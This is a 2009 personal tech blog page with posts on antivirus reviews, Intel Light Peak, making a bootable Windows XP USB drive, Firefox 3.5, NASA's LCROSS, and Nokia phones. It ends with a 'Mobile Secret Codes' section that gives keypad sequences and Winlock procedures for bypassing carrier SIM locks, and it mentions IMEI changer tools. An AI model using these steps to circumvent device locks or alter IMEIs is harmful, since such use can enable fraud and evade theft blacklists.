Protected by Copyscape DMCA Takedown Notice Infringement Search Tool
All opinions expressed on this blog are my own and do not reflect those of BIET Jhansi students and employees,staff,or any official whatsoever, colleagues, family or friends.I express my opinions as a free citizen of a democracy exercising my Fundamental Right of speech. The intention of this blog is merely to air my views and opinions (and sometimes, frustration) and is not intended to insult, instigate,disgrace or hurt anyone(body,organisation or institution). Anyone is free to disagree with any or all of my views and can express them here or elsewhere. Any civil dialogue that is not unreasonably hurtful is welcome. I, however, reserve the right to delete any comment without any reason or warning.No content of this blog will in any way be a violation UNDER IPC Sections 506 and 295A .Legal issues if any will be ristricted to the MEERUT jurisdiction only.This blog/web space is in the process of being copyrighted to safegaurd my interests erstwhile this be considered to be under the creative commons commercial INDIA License.This space resorts to politically and ethically correct statements, complying with the spirit of blogging .This is an opinion medium, not a reporting medium and hence should not be IN ANY CASE BE TAKEN AS A FUNCTION OF MAINSTREAM MEDIA.The blog complies with the NAAVI guidelines. Thank you, MANOJ SINGH RANA

Saturday, October 10, 2009

A True Foreign Beauty: The Winning 2014 Asian Games Stadium Design


We can argue about whether it looks like an alien spaceship, a colony on a distant planet, or something else, but let's agree that the winning stadium design for the 2014 Asian Games is mind-blowingly gorgeous. More »

F-Secure Internet Security 2010 Review


F-Secure
has released a new internet Security 2010 software featuring redesigned interface coupled with very easy to use parental control features that you can setup during your initial installation while F-Secure is downloading updates in the background, this new build is easy on system resources and F-Secure claims to have 60% faster virus scans than the previous version.

Our installation of the F-Secure Internet Security 2010 on a test PC having C2D E6320 and 2.5 GB RAM was finished in around 1 minute, after a restart and verification of the key, it showed the programs requesting Internet access like Steam client and others installed in our system, after clicking allow couple of times we were good to go , downloading updates and further installation took another 15 minutes on our 1 Mbps connection.

The parental control settings in the F-Secure 2010 Internet security are one of the easiest out there, so lets have a look at the parental controls


Browsing modes


You can also set time limit on the daily and weekend Internet browsing.

Better Content blocking based on cloud computing technology

System Scanning- Virus, Spyware removal

The overall speed of the scanning was good, our almost full 160 HDD including lots of software, games, applications, was scanned in 1 hours and 4 minutes, however there isn’t a pause scan option while scanning the hard drive so if you stop the scan, you would have to run it again from scratch. Pause scan option is particularly good when you just want to Hibernate your PC after pausing the scan and then turn it on later to resume scan from where it left, very helpful these days as HDD capacities have grown manifolds and scanning takes time. It detected all the viruses we have in our virus-pendrive with ease and the Anti-Spyware was pretty hard on the advertising agencies, and detected their tracking cookies as Spyware.

Full System Scan in Action - no pause button


Other thoughts: After installation of F-Secure our Local Area Network stopped working, we weren’t able to access files of our test PC from other PCs on LAN

, Even after configuring again with the Windows “Set up a home or small office network” it didn’t work, nor does it showed any warnings or asked for permission. I have to set this up manually by going to Settings -> Firewall -> Firewall Settings -> Trusted Network Adapter -> Select your Network Interface Card.

It was not able to detect our LAN IC on our Intel DG965RY motherboard, after selecting the network IC, local network access was restored. This might be a problem specific to our system.

Pros and Cons of F-Secure Internet Security 2010

Pros :

  • Very Easy on System Resources
  • Great Design and User Interface
  • Provides superb protection, it was able to detect and clean 4 viruses on our test system, which up to date free Avira couldn’t.
  • Easy to Set-Up
  • Good and easy to use Parental Control Settings
  • Browsing Protection
  • Statistics: provides quick overview of security history
  • Anti-Virus, Anti-Spyware and Anti-Spam protection in one package
  • Compatible with Windows 7, Windows Vista and Window XP

Cons:

  • While performing full system scan, System got noticeably slow and CPU usage went to as high as 75%, 10% being average
  • No Pause Scan button
  • Didn’t Detect LAN card automatically (this could be specific to our system)

Download F-Secure Internet Security 2010 trial

Intel's Light Peak Technology - Optical Cabling For the Masses

Intel has unveiled Light Peak, an optical cabling technology that can transfer data between your computer and peripherals at 10 Gb/s, fast enough to transfer a full-length Blu-ray movie in less than 30 seconds. Fiber-optic cabling is not new, but Intel executives believe Light Peak will make it cheap enough and small enough to be incorporated into consumer electronics at a price point that consumers and manufacturers will accept.

Fiber optics typically use a cigarette-box-sized optical transceiver, which contains tiny lasers and photo cells, to facilitate the connections. Intel miniaturized the box down to the dimensions of a wafer thin dime. Optical cables are already pretty tiny; each one is just 125 microns wide or about the width of a single human hair. The transceiver can deliver two channels of information over the fiber-optic cable—necessary since PCs need at least two ports.

click on image for fullview

Intel states that the technology will eventually scale up to a blazing 100 Gb/s.

Inside each transceiver are two tiny lasers only 250 microns wide, or the width of two human hairs, that transmit the light over each channel. The industry name for the lasers is VCSELs which stands for Vertical Cavity Surface Emitting Laser. Accompanying the lasers is a matching pair of photo detectors that receive laser light from the other end of the channels.

Another advantage of the optical cabling is that, unlike electrical cable, multiple protocols can be run over a single cable. Photons don't interfere with each other the way electrons do so multiple devices can share a single cable even if those devices are using different protocols. This will allow manufacturers to make even smaller yet more efficient components when building computer and electronic devices since they can use a single Light Peak component for connected devices. Light Peak's optical cabling will also allow for much longer cables since light does not degrade the same way electricity does over long distances.

Intel representatives explained that Light Peak could provide a better cabling solution to companies like 3ality. It makes a 3D video camera that transmits data at 8 Gb/s per second and currently uses bulky electrical cables.

Light Peak stands ready to replace the existing data transfer technologies of USB and FireWire and there is even speculation that Apple may skip over USB 3.0 and go straight to Light Peak. There are reports on the web that Light Peak is an outgrowth of Apple's desire to replace the multiple ports on their systems for a single port that could service all connected devices and that Apple's Steve Jobs might haves reached out to Intel's Paul Otellini for a fiber-optic solution.

Light Peak-based products could arrive as early as 2010.

Illustrated walk-through: Creating a bootable USB flash drive for Windows XP

Takeaway: A bootable flash drive can come in handy--but trying to create one might have you pulling out your hair. Windows expert Greg Shultz shares the method he followed, from configuring the BIOS to allow the USB port to act as a bootable device to creating a bootable image of Windows XP using the free PE Builder software (and a pair of Windows Server 2003 SP1 files) to formatting and copying the image onto a UFD.
--------------------------------------------------------------------------------------------------

The ability to boot Windows XP from a USB Flash Drive (UFD) offers endless possibilities. For example, you might make an easy-to-use troubleshooting tool for booting and analyzing seemingly dead PCs. Or you could transport your favorite applications back and forth from home to work without having to install them on both PCs.

However, before you can create a bootable UFD, you must clear a few hurdles. You saw that one coming didn't you?

The first hurdle is having a PC in which the BIOS will allow you to configure the USB port to act as a bootable device. The second hurdle is having a UFD that that will work as a bootable device and that's large enough and fast enough to boot an operating system such as Windows XP. The third hurdle is finding a way to condense and install Windows XP on a UFD.

If you have a PC that was manufactured in the last several years, chances are that its BIOS will allow you to configure the USB port to act as a bootable device. If you have a good quality UFD that's at least 512 KB and that was manufactured in the last couple of years, you've probably cleared the second hurdle. And once you've cleared those first two hurdles, the third one is a piece of cake. All you have to do is download and run some free software to create the bootable UFD.

I'll start by showing you how to determine whether your PC's BIOS will support booting from USB and explain how to configure it to do so. Then, I'll show you how to download and use the free software to create a bootable UFD running Windows XP Professional.

The UFD hurdle

You probably noticed that I didn't mention how to determine if your UFD would support being configured as a bootable device, except that it must be a good quality unit of recent manufacture. Well, I've discovered that when it comes to the actual UFD, you'll just have to try it and see what happens. As long as you have a PC with a BIOS that will allow you to configure the USB port to act as a bootable device and you have configured the installation correctly, it should work. If it doesn't, you probably have a UFD that can't boot.

I tested three UFDs on two new computers and had mixed success. First, I attempted to use a 128 MB PNY Attache but received an error message that said "Invalid or damaged Bootable partition" on both PCs. Next, I tried a 1GB Gateway UFD and it worked on both PCs. Then, I tried a 256 MB Lexar JumpDrive Pro and it worked on only one of the PCs. You can find lists of UFD brands that others have had success with on the Internet.

Checking the BIOS

Not every new BIOS will allow you to configure the USB port to act as a bootable device. And some that do allow it don't make it easy. On one of my example systems, it was a no-brainer. On the other, the UFD had to be connected to the USB port before it was apparent that I could configure it as a bootable device. Let's take a closer look.

On the test system with a PhoenixBIOS version 62.04, I accessed the BIOS, went to the boot screen, and found that USB Storage Stick was one of the options. I then moved it to the top of the list, as shown in Figure A, thus making it the first device to check during the boot sequence. (This particular BIOS also allowed me to press the [F10] key during the boot sequence and select any one of the available bootable devices, so it really wasn't necessary to move it to the top.)

Figure A

The settings on the Boot Screen of the PhoenixBIOS made it a no-brainer to select the device.

On the test system with an AMI BIOS version 2.59, I accessed the BIOS, went to the Boot Sequence screen, and didn't find a USB boot option, as shown in Figure B.

Figure B

A USB boot option didn't appear on the Boot Sequence screen.

I then went one step further and checked the Hard Disk Drives screen and still didn't find a USB boot option, as shown in Figure C.

Figure C

The Hard Disk Drives screen only showed the SATA hard disk.

I then plugged a UFD into the USB port, booted up the system, and accessed the BIOS. When I checked the Hard Disk Drives screen, the UFD appeared in the list and I could select it as the first drive (Figure D).

Figure D


With the UFD plugged into the USB port, I could configure the UFD as a bootable device.

When I returned to the Boot Sequence screen, the UFD was indeed set as the first bootable device (Figure E).

Figure E


As the Boot Sequence screen indicates, the UFD was set to be the first bootable device.

Rounding up the software

To condense and install Windows XP on a UFD, you'll need a program called PE Builder by Bart Lagerweij. You'll also need two files from the Windows Server 2003 Service Pack 1. And of course, you need to have a Windows XP Professional CD.

You can download PE Builder from Bart's Web site. At the time of this writing, the most current version of PE Builder was 3.1.10a.

You can download Windows Server 2003 SP1 by following the link in the Knowledge Base article "How to obtain the latest service pack for Windows Server 2003." Be sure to get the 32-bit version!

Keep in mind that at 329 MB, Windows Server 2003 SP1 will take some time to download. And although you need just two small files, the only way to get them is to download the entire package.

------------------------------------------------------------------------------------------------

Warning

Do not run the Windows Server 2003 SP1 executable file! Doing so will completely corrupt Windows XP. We will use a set of special commands to extract the two files and then delete the rest of the package.

------------------------------------------------------------------------------------------------

Preparing the software

Installing PE Builder is quick and easy. Just run the installation program and follow the onscreen instructions. To make things simpler, I installed the program in the root directory in a folder called PEBUILDER3110a.

Once PE Builder is installed, you'll need to create a folder in C:\PEBUILDER3110a called SRSP1, as shown in Figure F. This is the folder in which PE Builder will look for the extracted Windows Server 2003 SP1 files.

Figure F

Once PE Builder is installed, you'll need to create folder called SRSP1 in C:\PEBUILDER3110a.

Now, you can begin extracting the two needed files from Windows Server 2003 SP1. When you download the Windows Server 2003 SP1, the executable file will have a long name: WindowsServer2003-KB889101-SP1-ENU.exe. To save on typing, you can rename the file to something shorter, such as WS-SP1.exe.

To begin, open a Command Prompt window and use the CD command to change to the folder in which you downloaded the Windows Server 2003 SP1 executable file. I downloaded the file to a folder called Downloads. Now, to extract the files contained in SP1, type the command

WS-SP1.exe -x

You'll immediately see a dialog box that prompts you to select a folder in which to extract the files and can type the name of the same folder, as shown in Figure G. Click OK to proceed with the extraction procedure. When the procedure is complete, just leave the Command Prompt window open.

Figure G

You can extract the files into the same folder containing the Windows Server 2003 SP1 executable file

The extraction procedure will create a subdirectory called i386 and extract all the Windows Server 2003 SP1 files there. Use the CD command to change to the i386 folder and then copy the setupldr.bin file to the SRSP1 folder with the command:

copy setupldr.bin c:\pebuilder3110a\srsp1

Expand the ramdisk.sy_ file to the SRSP1 folder with the command:

expand -r ramdisk.sy_ c:\pebuilder3110a\srsp1

These three steps are illustrated in Figure H.

Figure H


You'll copy and expand the two necessary files to the SRSP1 folder.

Now, using Windows Explorer, verify that the two necessary files are in the SRSP1 folder, as shown in Figure I. Once you do so, you can delete all the Windows Server 2003 SP1 files.

Figure I

You'll want to verify that the setupldr.bin and ramdisk.sys files are in the SRSP1 folder.

Running PE Builder

Now that you've extracted the necessary files from the Windows Server 2003 SP1 package, you're ready to use PE Builder to create a compressed version of Windows XP. To begin, place your Windows XP Professional CD into the drive and hold down the [Shift] key to prevent Autostart from launching the CD. Then, launch PE Builder.

In the Source field on the main PE Builder screen, simply type the letter of drive in which you put the Windows XP Professional CD, as shown in Figure J. Make sure that the Output box contains BartPE and that the None option is selected in the Media Output panel. Then, click the Build button.

Figure J

Fill in the Source field on the main PE Builder screen.

As PE Builder compresses Windows XP Professional into a bootable image, you'll see a detailed progress dialog box. When the operation is complete, as shown in Figure K, click the Close button.

Figure K

PE Builder displays a detailed progress report.

Preparing the UFD to boot Windows XP

At this point, you're ready to format and copy the Windows XP Professional bootable image to the UFD with the BartPE USB Installer. To do so, open a Command Prompt window and use the CD command to change to the pebuilder3110a folder. Then, insert your UFD into a USB port and take note of the drive letter that it is assigned. On my example system, the UFD was assigned drive E.

Now, type the command

pe2usb -f e:

You'll then be prompted to confirm this part of the operation, as shown in Figure L. While the operation is underway, you'll see progress indicators.

Figure L

You'll be prompted to confirm that you want to format your UFD.

Once the BartPE USB Installer finishes its job, you'll be prompted press any key to exit the program. Now you can use your UFD to boot your computer into the BartPE interface for Windows XP, as shown in Figure M.

Figure M

The BartPE interface provides you with a pared down version of Windows XP.

You can find a list of specialized applications on Bart's Web site, which you can install on your UFD as Plugins. For example, you can find such things as Firefox or McAfee command-line virus scanner.

Conclusion

Booting Windows XP from a UFD requires that your PC's BIOS support booting from USB and that you have a UFD that can be formatted as a bootable device. If you can meet these two requirements, all you need is PE Builder, a couple of files from the Windows Server 2003 Service Pack 1, and a little effort to configure a UFD to boot the BartPE interface to Windows XP.

Friday, October 9, 2009

Firefox 3.5 now available

Its been a long wait, but Firefox 3.5 is finally here, with perhaps a little less pomp than the world record setting Firefox 3.

While Firefox 3.5 is unlikely to beat its predecessor's world record of 8 million downloads in one day, this one is still a significant step forward, especially with its support for many of the HTML5 features we're all waiting for. What was meant to be a rather small 3.1 update has now become a major version in its own right.

Since the release of Google Chrome, the browser world had become rather more complicated, with some praising its simplicity while others criticizing its lack of features and lack of extendability. Most browsers have had to adapt to the Chrome's new innovative tab managements system, a feature has since been adopted in Opera and Safari too, and as of Firefox 3.5, you can now tear away tabs, and recombine them into the same window.

Another feature of Firefox which comes as a result of peer pressure is a private Browsing mode. By clicking on "Start Private Browsing" (shortcut Ctrl+Shift+P) you can now enter a land of no worries. No traces of your actions during a Private Browsing session are maintained across sessions. Even besides that the privacy features have been ramped up, and now you can choose to discard only the "offending" part of your history, for the last hour, two hours, four hours, or day.

Firefox 3.5 packs an updated Gecko 1.9.1 layout engine and the new TraceMonkey javascript just-in-time (JIT) compiler for blazing fast JavaScript execution, which means faster running web-apps, although it still doesn't manage to overtake Safari 4 or Chrome 3.

Other improvements in speed can come from Web-Workers which will allow web-developers to create multi-threaded web applications resulting in more responsive interfaces even while complicated JavaScript application churn away in the background, and native support for JSON. All resulting in a much happier Ajax experience.

Location sensitive browsing support is now also a part of Firefox. Web sites can now access data about your physical location to provide targeted content, and can share you location with others (with your permission, of-course!). With the new era of multi-touch computing Firefox is now also multi-touch aware, with support for pinching and swiping gestures for zooming, and moving in the history respectively.

This rather impressive list of features, which was more than what was initially planned was enough for it to be upgraded from a simple single point release (and till beta 3 it was Firefox 3.1) to rather more significant 3.5 release. This isn't the end of line for the Firefox 3 series though, coming up next is Firefox 3.6 (earlier 3.2) which besides other things will bring you a new graphical tab-switcher. Look out Safari, Opera and Chrome, your competition has arrived!

Download Firefox 3.5 here.

NASA crashes rocket on the moon in search of water!

In space, no one can hear you scream. So a rocket crashing on the moon won’t give out a satisfactory loud explosion either; but NASA’s plans to bomb the moon in search of water were still a little more tepid than we expected.
The US space agency has successfully bulldozed two spacecraft into the moon's South Pole in a search for hidden ice, but without the promised live photos and expectant.
The planned crash of the LCROSS (Lunar Crater Observation and Sensing Satellite) was to send up a cloud of lunar dust for miles, which the scientists would observe in detail to detect if there are water molecules on the moon.
But it made for quite a disappointing live broadcast. In a streaming transmission on the official Web site, NASA’s control room said the probe was nearing the moon, but then the screen went completely grey for a while. Momentarily, a team of NASA scientists high-fived each other for a job well done.
While we didn’t get to see it, the Associated Press has the full run of play as to how it all happened: “First, a 2.2-ton empty rocket hull smacked the moon's South Pole at 5:01 PM IST on Friday. Then, four minutes later, the camera-and-instrument laden space probe made its death plunge.
“The smaller probe had five cameras and four other scientific instruments and NASA had touted live photos on its web site. But those images didn't occur.
“NASA officials say they are sure the two probes crashed and are looking to see what happened to the pictures.”
Hopefully, we should see the images soon because they would make for some great viewing! In any case, it should take some time to analyse the data and reach a conclusion.

Touch Screens for the visually impaired

With all the success that touchscreens have, they are still essentially useless unless you are looking at the device while using it. Despite its multi-touch goodiness, you'll still need to take you iPod Touch out if you want to change the song. This is also a distinct disadvantage to the visually impaired, since they are not able to feel the 'features' on the screen.

Jussi Rantala of the University of Tampere in Finland along with colleagues have come up with a way to simulate a braille on the screen of a device, using vibrations. They simulated a braille character by representing a raised dot as an intense vibration, and the absence of a dot as longer but weaker pulsed vibrations. Braille encodes characters as a 2x3 grid of dots, where characters are represented based on which dots are raised. People trained to read braille can read the patterns using their finger and hence can read texts even without sight. This innovation promises to bring this marvelous.

To enable this they developed software for the Nokia 770 Internet Tablet, which has piezoelectric1 material built into the touchscreen. They tested two modes of operation for this virtual braille, one in which the reader places his finger on the left side of the screen and sweeps horizontally to read the rest of the dots, and the other in which the reader keeps the finger fixed on one location, and the dots vibrate in and out sequentially in that spot. The first one seemed to be quite difficult to read however. Much like many screen reading software read out the text displayed on the screen, they hope to present the screen content in braille form.

This is a wonderful innovation for touchscreens, as they can finally become more accessible to the visually impaired. This technology can have pretty interesting applications otherwise too. Using vibrations they can also indicate the presence of buttons and controls on the screen, allowing people to control their devices without looking at them.

Western Digital 1 Terabyte Caviar Black Edition HDD

It don’t matter if you’re black or white?

With newer Hi-Def video and audio formats becoming popular, games getting larger, and collections growing, you need more space, period. Western Digital plans to satiate your hunger for space with their new 1 Terabyte Caviar Black edition HDD.

This HDD is almost the same size of a 500GB HDD, despite the increased amount of memory platters. They managed to keep the height low by using perpendicular recording.

The WD caviar comprises of dual processors for twice the data processing speed as normal drives, coupled with a massive 32 MB of buffer memory that ensures that you get the maximum performance. Along with Acoustic management this drive also features Power management that allows it to power itself down when the drive is not in use or reduce its speed to a lower RPM when lower levels of performance are required.

We tested the WD Caviar Black edition HDD for its performance in real world scenarios using HD tach and SiSoft Sandra, and it did well, but not that much better. It gave us a random access time of 12.3 ms, while the average read and write speeds came to 81.1 and 92 MBps respectively, with CPU utilization at a maximum of 4 per cent. SiSoft Sandra gave it a Drive Index of 80 MBps, and listed the access time as 12 ms.

[Review] Need For Speed: Shift

Since NFS: Most Wanted, the franchise hasn’t seen any game that has been a major hit. With the widely different tastes of its followers, Electronic Arts (EA) decided to trifurcate the series into a simulation racer, an arcade racer and an online component.
Shift is the first of this new lot, where NFS is going back to its roots and giving sim racing one more try, undeterred by the calamity known as ProStreet. And surprisingly, they’ve almost pulled it off…



Need For Speed: Shift isn’t the wild ride that we have come to expect from the franchise. It’s an emperor trying out new clothes, while still trying to make the followers accept the change in garments.
Taken in the context of a game that is meant to build a franchise of simulation-based racing games, NFS: Shift is the perfect introductory point for arcade racing fans to get into this new groove. Race Driver: Grid was the only other game that made the transition as simple as this.

Office 2010 to come in Ad-supported version

With the coming 14th version of Office, Microsoft is introducing new models for people to try out and buy the suite, which include a web-based Click-to-Run approach and an Ad-based model.

No doubt Microsoft Office is popular, and a large number of its users, especially in India, use unlicensed versions. Few here can afford even the cheapest Home and Student Edition which comes for around Rs. 300 after spending 5,000 to 10,000 on a Windows license (if they even bought that).

According to Mcrosoft's statistics, 500 million people around the world use Office, and that the last two years have seen s boost in sales of their entry-level product, the Home and Student edition of Office.

Now they plan to introduce another edition of Office, the Starter Edition. Much like the starter editions of Windows, they plan to have this product available only on new PCs. This version will be ad-supported, and will only include Word 2010 and Excel 2010, and offer "basic functionality for creating, viewing and editing documents."

Till now new laptop or PC buyers often found themselves with either a trial version of Microsoft Office, or a Microsoft Works, which is another office suite by Microsoft which has a rather poor workflow with the Microsoft Office suite. The new Starter edition of Office will replace Microsoft Works and eliminate the need for a trial by straight away giving people a version of Office which doesn't expire.

This is a smart way of raking in money from those who are uninterested or uninclined to purchase a full copy of the Office suite, and to get some money from an audience which would otherwise have just installed a pirated version.

Another new optimization in Microsofts approach towards Office is the introduction of a new "Product Key Card". It is essentially just the serial key you need to activate the version of Office bundled with your PC, and does away with everything else which is inessential, such as the DVD itself!

These new models are mostly to the benefit of those buying a new PC bundled with Office. For the people who already have PCs, Microsoft will offer a new Click-to-Run Office 2010 version, which will allow people to install and run a trial of Office 2010 with ease, and in fact it even uses virtualization technology which allows you to try Office 2010 even with an older version installed.

It is nice to see Microsoft realizing that piracy will not stop no matter how much protection you add, as people will find a way around it. The answer lies instead social engineering, providing people with something they need or want is such a way as to still make a profit, but Microsoft still needs to cater to those not buying new PCs, and provide a downloadable version, we're sure it'll end up on the web anyway.

Nokia launches two new camera-centric phones

In the camera-phone department, Nokia has regularly lagged behind Sony’s Cyber-shot series and Samsung’s high-end handsets. The company is not seeking to reverse its fortunes with two new offerings, the Nokia 6700 Classic and the Nokia 6303 Classic.



The 6700 is the big brother of the two, featuring a 5-megapixel sensor while the 6303 settles for 3.15-megapixel pictures. Both cameras are equipped with autofocus and LED flash, and can shoot VGA video footage at 15 frames per second.
While both phones come with a 2.2-inch screen that displays 16 million colours at a resolution of 240x320 pixels, the 6700 also has an accelerometer fitted underneath to auto-rotate the screen when you change your orientation.
The 6303, on the other hand, is a bit more music-minded as it features a 3.5-mm audio jack to connect your favourite headphones.
The 6700 has 170MB of internal memory, while the 6303 comes with 64MB built in. Of course, this can be expanded with a microSD card of up to 16GB for the 6700 and 4GB for the 6303.
For connectivity, both phones feature EDGE, Bluetooth 2.1 and a microUSB port. The 6700, though, goes a bit further and throws in 3G and GPS too.
As for battery life, the 6303 classic will give you seven hours of continuous talk-time, while those on the 6700 will have to settle for a slightly lesser average of five hours.
Considering these specifications, pricing the 6303 classic at Rs 8,000 and the 6700 classic at Rs 14,000 seems quite fair, yes?

Mobile Secret Codes

Nokia 31xx
____________

Firmware version
*#0000# or *#3110#
IMEI Code
*# 06 #
Restores Factory Settings
*#7780#
Warranty Codes
*#92702689# (= *#war0anty#)

Just scroll down through the information. If entering the above code requires a
further warranty code try entering the following:

6232 (OK) : Month and year of manufacture
7332 (OK) : Last repair date
7832 (OK) : Purchase date (if previously set)
9268 (OK) : Serial number
37832 (OK) : Set purchase date (this can only be done once)
87267 (OK) : Confirm transfer

Nokia 5110
_____________

IMEI Number *#06#
For checking the IMEI (International Mobile Equipment Identity).
---------------------------------------------------------
Security Code 12345
Default security code is 12345. If you forgot your security code, there s so many program on the net which allowed you to know the security code likes Security ID Generator, Nokia IMEI Changer, etc.

update:
Security ID Generator (SID.EXE) and IMEI Generator (NOKIAIMEI.EXE) doesn t works with Nokia 5110
Resetting Security Code

If you accidentally lock the phone or forgot the security code, the best thing to do is check it with your local Nokia dealer. For advanced user, you can use WinTesla, PCLocals or LogoManager program to read the security code or resetting the code (You will need an FBUS/MBUS (or compatible) cable to do this.
---------------------------------------------------------
Software Version *#0000#
For checking the phones software (SW) - called firmware revision information.
e.q : Version V. 4.51 (26-03-98) will display
V 04.51
26-03-98
NSE-1

first line:
The Software Version (my guess is that this software has been used in previously Nokia-phones, what do you say?!).

second line:
The Date of the SW release.

third line:
NHE-8 has something to do with the type of phone you are dealing with. Is it GSM 900 (standard), GSM 1800 (DCS1800) or GSM 1900 (PCS1900)?
Nokia 2110, 3110, 8110(i) are all NHE types. The only thing that vary is the code after NHE- ("8").
NHE = GSM 900, NHK =GSM 1800 - The number in the end = the model (2110i = 4 etc.)
The 5110 and 6110 is called NSE-1 and NSE-3...this may be because it supports EFR (?)

update:
Newest Software Version was V5.22 (xx-xx-99)
V 05.22
01-07-99
NSE-1

If your software version is V4.00, upgrade your software version to latest version. V4.00 contains bugs that sometimes will show message,
"SIM Card Not Ready" even the card is already inside the phone.
---------------------------------------------------------

Software Update
The only thing to do (for you and me) is for us to go to the nearest Nokia dealer and make him do it for you. Just remember that it is supposed to be free (a receipt is required) so don t let him tell you anything else!
---------------------------------------------------------

SIM clock *#746025625# [*#sim0clock#]
to check if the Sim-Clock can be Stopped. This option is depen on your service provider network. (Sim-clock-stop is a kind of standby mode which will save battery time)

update:
This code doesn t work on phone with software version 4.59.
---------------------------------------------------------

Waranty Code *#92702689# [*#war0anty#]
Menu:
Displays Serial Number.
Displays the Month and Year of Manufacture (0698)
Displays (if there) the date where the phone was purchased (MMYY) you can here set the Purchasing Date
(Warning: You can only do this once - so be careful what you write)
Displays the date of the last repairment - if found (0000)
The next screen has Transfer User Data? (the same option as the 8110)
To exit turn the phone off and then back on.
---------------------------------------------------------

SP Lock The Service provider (SP) lock
Is used to lock the cell phone to the SP s SIM card. Once the cell phone is locked to a specific operator, if one inserts a SIM card from a different operator the phone will refuse to accept it!
The cell phone will however accept another SIM card from the same operator.

All Nokia phones (2110 and newer) have four different SIM locks which can be used to lock the phone for up to 4 different providers. But most phones with restriction only have one lock activated. ( lock 1)
The main code used in Nokia phones is:

#pw+(master code)+Y#

This code is able to check, activate or remove Sim card restriction (SP-lock).
Use the * key to get the p, + and w chars.
Y has to be 1,2,3 or 4 - depending of what lock you what to deal with.

#pw+1234567890+1# for Provider-Lock status
#pw+1234567890+2# for Network-Lock status
#pw+1234567890+3# for Provider(???)-Lock status
#pw+1234567890+4# for SimCard-Lock status

(master code) is a 10 digit code, based on the phones IMEI number.
(I can NOT give you the master code SO DON T ASK ME FOR IT! )

Please click here to learn more about how to obtain mastercode and find out the lock status of your phone
eq. To remove restriction on lock 1 type following code:

#pw+(master code)+1#

If you just want to check your phone use 10 random numbers Eg. 1234567890 as the (master code)
eq. To check if phone if restricted on lock 1 type the following code:

#pw+1234567890+1#

Please NOTE that these codes could be used with care!
A user told me that it s only possible to type in about 3 different codes on each lock! Then something bad will happen ..therefore be careful!
---------------------------------------------------------

How can I check what locks have my phone closed?

There is 2 methods:
Use winlock to see the state of the locks, pressing Read Info.The Counter is the number of times that you have tried unlock your phone using an incorrect master code.
You can check it entering an imaginary mastercode on your phone but, it s not recommended because if you try enter a code 5 times your phone will not work anymore. By example, if you press at your phone #pw+1234567890+2# (note that # , p , w and + characters must be selected from * key) and your phone give you Code Error then your phone have lock 2 closed, if you get the message SIM Restriction Off your phone have lock 2 opened.
Look the table above to see how can check all locks:

Lock number Description Sequence to Check
1 Provider Lock #pw+1234567890+1#
2 Network-Lock #pw+1234567890+2#
3 Another Provider Lock #pw+1234567890+3#
4 SIM Card Lock #pw+1234567890+4#
---------------------------------------------------------
Unlock SP-Lock
Here is a way to Unlock your phone which is Service Provider locked, without to know SPLock code. With a Nokia 16xx/21xx/31xx/51xx/81xx that are SIMlocked to one privider you can bypass the SP lock like this:

First of all, PIN CODE MUST BE ON, then press:

C

C and hold until it clears display
* and hold until start to blink
* and hold until start to blink
04***your pin>#

Each time you turn your phone OFF it resets the lock, so this need to be done each time you ll turn your phone ON

The phone now says: PIN CODE CHANGED (or ACCEPTED)
and the SIM card is accepted until you restart the phone again.

NOTE: On vesion 5.04 Nokia has removed this option !

update:
There s another Nokia service provider lock generator for DOS (somehere on the net) called 5161un.zip (for Nokia 51xx-61xx models) This program uses the #pw+(master code)+1# code to unlock the phone. With this software you need to have a access to the eeprom.. Sad
---------------------------------------------------------

Bypass the SP-lock

With a Nokia 16xx/21xx/31xx/51xx/81xx that are SIM locked to one privider you can bypass the SP lock like this:

Insert sim card of diferent provider.

Turn on the phone and press the UP VOLUME key for 3 sec. then release it and the phone says PIN CODE ?

Press the "C" key.

Then Press * and wait until it desapear and apear again, then press * one more time and 04*PIN*PIN*PIN#

The phone now says: PIN CODE CHANGED (or ACCEPTED)
and the SIM card is accepted until you restart the phone again.

update:
On version 5.04 Nokia has removed this option !
---------------------------------------------------------

How to open lock 1 and 4?
You will need Winlock software and MBUS cable to do this. Winlock is a Nokia service program that you can use to open lock 1 and 4, really you are closing locks when you do that, but when you write ????? at MCC+MNC and MSIN text box, the phone don t understand it and consider that it s open.

That trick only works for lock 1 and 4, but not for lock 2 and 3. If you did not know your lock type, please read our miscellaneous tips page first. or read at above section in this page.

Install winlock 1.10
Connect your MBUS nokia data cable
Run Winlock
Push Read Phone, if you have Lock 2 or Lock 3 closed you can not open your phone, but you can try change Lock 2.
Select State Close in Lock 1 and Lock 4, fill out MCC+MNC and MSIN text boxes with ??????? and Push Close Locks.
Now you can use any operator card in your phone. If you get any error when you do that do the following steps:
Select State Automatic in Lock 1 and Lock 4 and change type to User in Lock 1 and Lock 4, fill out MCC+MNC and MSIN text boxes with ?????????? and Push Close Locks.
Select State Automatic in Lock 1 and Lock 4 and change type to Factory in Lock 1 and Lock 4, fill out MCC+MNC and MSIN text boxes with ?????????? and Push Close Locks.
If you continue getting errors you must turn off your phone and reset computer and try again.
---------------------------------------------------------

How to open lock 2?

When operators companies close lock2 you can only use the contract or prepaid card for this operator, but you can use another operator company prepaid card if you know what GID1 must write.

Install Winlock
Run Winlock
Configure Winlock. Select menu Winlock->Defaults and change GID byte count to 2.
Push Read Phone, and write down GID1 info that appear in lock 2.
Insert the prepaid card from a different operator company.
We must find out a the GID1 info adecuate for our new prepaid or contract card, take a look at our GID1 list and check if your operator and SIM card type is included, if not try to get a phone that have lock 2 closed and have the SIM card type that you want to use in your phone, and read GID1 info with winlock. You can try to write the most used GID1 codes like 0000,10FF,01FF, or FFFF, etc.
Change Lock 2 Type from User To Factory or from Factory to User.
Push Close Locks
Your phone will be reset every time you push Close Locks, if your card is not acepted the GID1 is not correct, repeat from step 4 until you find the correct GID1.
If you get error you must turn off your phone and reset computer and try again.
If you want your phone accept your original prepaid card write in GID1 the code you read at step 2 and close locks.
Exist a GID1 list?

In addition to the official way to open locks that Nokia service centers use with TDB4 or TDF-4(for WinTesla) security boxes, there is two secrets methods:

Opening the phone and adding a chip inside phone motherboard. But you will loose any warranty of your phone.
Using a special software with a MBUS Nokia cable. I don t have this software. Please don t bother me asking me about that. The only thing i know about that is that a friend is removing lock 2 using a special software. He don t make this for money, only for fun.
--------------------------------------------------------

Main Code #pw+(master code)+Y#
This code is able to check, activate or remove Sim card restriction (SP-lock).

Use the * key to get the p, + and w chars.
Y has to be 1,2,3 or 4 - depending of what lock you what to deal with.

#pw+1234567890+1# for Provider-Lock status
#pw+1234567890+2# for Network-Lock status
#pw+1234567890+3# for Provider(???)-Lock status
